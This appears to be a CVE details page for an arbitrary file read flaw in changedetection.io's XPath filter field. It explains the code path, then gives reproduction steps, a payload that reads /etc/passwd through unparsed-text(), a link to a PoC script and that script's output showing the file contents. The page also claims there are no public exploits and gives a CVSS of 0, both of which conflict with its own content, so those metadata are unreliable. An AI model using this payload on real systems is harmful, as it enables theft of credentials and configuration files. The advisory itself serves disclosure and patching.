What is CVE-2026-29039?

### Summary - The changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification. - XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process. ### Data Flow ``` User Input (include_filters field) ↓ forms.py:ValidateCSSJSONXPATHInput() - Only validates syntax, NOT function safety ↓ Watch configuration stored in datastore ↓ Scheduled fetch triggers html_tools.py processing ↓ html_tools.py:xpath_filter() at line 213 ↓ elementpath.select(root, xpath_expression, parser=XPath3Parser) ↓ XPath 3.0 unparsed-text('file:///etc/passwd') executed ↓ File contents returned as "filtered content" ↓ Stored as snapshot, viewable in UI ``` **Affected Code** **File:** changedetectionio/html_tools.py **Function:** xpath_filter() **Lines:** 187-220 ``` def xpath_filter(xpath_filter, html_content, append_pretty_line_formatting=False, is_rss=False): # ... from elementpath import XPath3Parser # XPath 3.0 with dangerous functions # ... r = elementpath.select(root, xpath_filter.strip(), parser=XPath3Parser) # Line 213 ``` Validation (forms.py): ``` class ValidateCSSJSONXPATHInput: def __call__(self, form, field): # Only checks if XPath is syntactically valid # Does NOT check for dangerous functions like unparsed-text() ``` ### Details - Navigate to the http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000/ instance - Create a new watch with any valid URL (e.g., https://example.com) - Edit the watch and set the "CSS/JSONPath/JQ/XPath Filters" field to: ``` xpath:unparsed-text('file:///etc/passwd') ``` - Save and trigger a recheck - View the preview/snapshot - the file contents will be displayed ### PoC python script for easy reproduction: https://gist.githubusercontent.com/DhiyaneshGeek/27a6239f34023d43a0b89afb05edc5d2/raw/76d2b1f035164298d57699741eb79a8376f4ed47/poc_xpath_file_read.py ``` python3 poc_xpath_file_read.py http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000 /etc/passwd ╔═══════════════════════════════════════════════════════════════╗ ║ XPath 3.0 Arbitrary File Read Exploit ║ ║ Target: changedetection.io ║ ║ Vulnerability: unparsed-text() in XPath filters ║ ╚═══════════════════════════════════════════════════════════════╝ [*] Creating new watch for https://example.com... [+] Watch created with UUID: 5215b704-809c-4218-952b-aad9b6ee41e1 [*] Setting XPath filter to read: /etc/passwd [+] XPath filter set successfully [*] Triggering recheck... [*] Waiting for check to complete... [*] Retrieving file contents... [+] SUCCESS! File contents retrieved: ============================================================ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin ============================================================ [*] Cleaning up (deleting watch)... ``` ### Impact - Read any file accessible to the application process - Exfiltrate sensitive configuration files, credentials, API keys - Read application source code - Access database files if file-based (SQLite)

What is the severity of CVE-2026-29039?

CVE-2026-29039 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-29039?

No known public exploits are currently available for CVE-2026-29039.

Is there a patch available for CVE-2026-29039?

Yes, patches are available for CVE-2026-29039. Check the vendor advisories for update instructions.

CVE-2026-29039 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

The changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification.
XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process.

Data Flow

User Input (include_filters field)
    ↓
forms.py:ValidateCSSJSONXPATHInput() - Only validates syntax, NOT function safety
    ↓
Watch configuration stored in datastore
    ↓
Scheduled fetch triggers html_tools.py processing
    ↓
html_tools.py:xpath_filter() at line 213
    ↓
elementpath.select(root, xpath_expression, parser=XPath3Parser)
    ↓
XPath 3.0 unparsed-text('file:///etc/passwd') executed
    ↓
File contents returned as "filtered content"
    ↓
Stored as snapshot, viewable in UI

Affected Code File: changedetectionio/html_tools.py Function: xpath_filter() Lines: 187-220

def xpath_filter(xpath_filter, html_content, append_pretty_line_formatting=False, is_rss=False):
    # ...
    from elementpath import XPath3Parser  # XPath 3.0 with dangerous functions
    # ...
    r = elementpath.select(root, xpath_filter.strip(), parser=XPath3Parser)  # Line 213

Validation (forms.py):

class ValidateCSSJSONXPATHInput:
    def __call__(self, form, field):
        # Only checks if XPath is syntactically valid
        # Does NOT check for dangerous functions like unparsed-text()

Details

Navigate to the http://ewn9c0k01ghh7f588a7mij4y1w6iz8gb.tryneoai.com:5000/ instance
Create a new watch with any valid URL (e.g., https://example.com)
Edit the watch and set the "CSS/JSONPath/JQ/XPath Filters" field to:

xpath:unparsed-text('file:///etc/passwd')

Save and trigger a recheck
View the preview/snapshot - the file contents will be displayed

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com Github.com